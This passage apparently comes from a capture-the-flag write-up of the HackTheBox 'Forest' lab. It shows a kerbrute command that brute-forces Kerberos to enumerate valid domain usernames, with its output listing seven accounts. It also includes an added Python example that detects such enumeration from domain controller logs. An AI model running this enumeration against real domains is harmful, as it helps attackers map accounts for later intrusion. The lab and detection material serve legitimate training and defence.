Kerberos
Nmap discovered a Kerberos service running on target ports 88 and 464
Username enumeration
Given the fact that I don’t have any credentials, I can aim to enumerate some valid domain usernames by brute-forcing the Kerberos service.
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ kerbrute userenum --dc $IP -d htb.local /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/22/23 - Ronnie Flathers @ropnop
2023/01/22 13:01:34 > Using KDC(s):
2023/01/22 13:01:34 > 10.10.10.161:88
2023/01/22 13:01:34 > [+] VALID USERNAME: mark@htb.local
2023/01/22 13:01:34 > [+] VALID USERNAME: andy@htb.local
2023/01/22 13:01:37 > [+] VALID USERNAME: forest@htb.local
2023/01/22 13:01:39 > [+] VALID USERNAME: administrator@htb.local
2023/01/22 13:01:49 > [+] VALID USERNAME: sebastien@htb.local
2023/01/22 13:02:08 > [+] VALID USERNAME: santi@htb.local
2023/01/22 13:02:12 > [+] VALID USERNAME: lucinda@htb.local
Kerbrute identified a total of 7 valid domain users:
mark
andy
forest
administrator
sebastien
santi
lucinda
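How this enumeration looks from the domain controller's side, as an added detection example that is not part of the original writeup: it flags any source that requests TGTs for many distinct nonexistent accounts in a short window. It assumes Kerberos Authentication Service failure auditing is enabled so that unknown principals produce Security event 4768 with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN); the simplified record layout, addresses, account names and thresholds are constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample records (not from the writeup): simplified fields of
# Security event 4768 as (timestamp, client address, account name, result code).
SAMPLE_EVENTS = [
    ("2023-01-22 13:00:10", "192.0.2.77", "jsmiht", "0x6"),   # user typo
    ("2023-01-22 13:00:25", "192.0.2.77", "jsmiht", "0x6"),   # same typo again
    ("2023-01-22 13:00:40", "192.0.2.77", "jsmith", "0x0"),   # successful request
    ("2023-01-22 13:01:34", "192.0.2.50", "info", "0x6"),     # wordlist-style burst
    ("2023-01-22 13:01:34", "192.0.2.50", "test", "0x6"),
    ("2023-01-22 13:01:35", "192.0.2.50", "guest1", "0x6"),
    ("2023-01-22 13:01:36", "192.0.2.50", "support", "0x6"),
    ("2023-01-22 13:01:37", "192.0.2.50", "webmaster", "0x6"),
    ("2023-01-22 13:01:39", "192.0.2.50", "sales", "0x6"),
]

UNKNOWN_PRINCIPAL = "0x6"  # KDC_ERR_C_PRINCIPAL_UNKNOWN


def detect_userenum(events, window=timedelta(seconds=60), threshold=5):
    """Return {source_ip: peak count} for sources that asked for at least
    `threshold` distinct unknown account names within a sliding `window`."""
    recent = defaultdict(deque)  # source ip -> deque of (time, account name)
    flagged = {}
    # Timestamps are zero-padded, so sorting the tuples orders them by time.
    for ts, ip, name, code in sorted(events):
        if code.lower() != UNKNOWN_PRINCIPAL:
            continue  # only failed lookups of nonexistent principals count
        now = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        queue = recent[ip]
        queue.append((now, name.lower()))
        # Drop entries that have aged out of the window.
        while now - queue[0][0] > window:
            queue.popleft()
        # Count distinct names so one repeated typo never trips the alert.
        distinct = len({n for _, n in queue})
        if distinct >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged


if __name__ == "__main__":
    for ip, count in detect_userenum(SAMPLE_EVENTS).items():
        print(f"possible Kerberos username enumeration from {ip}: "
              f"{count} distinct unknown principals within the window")
```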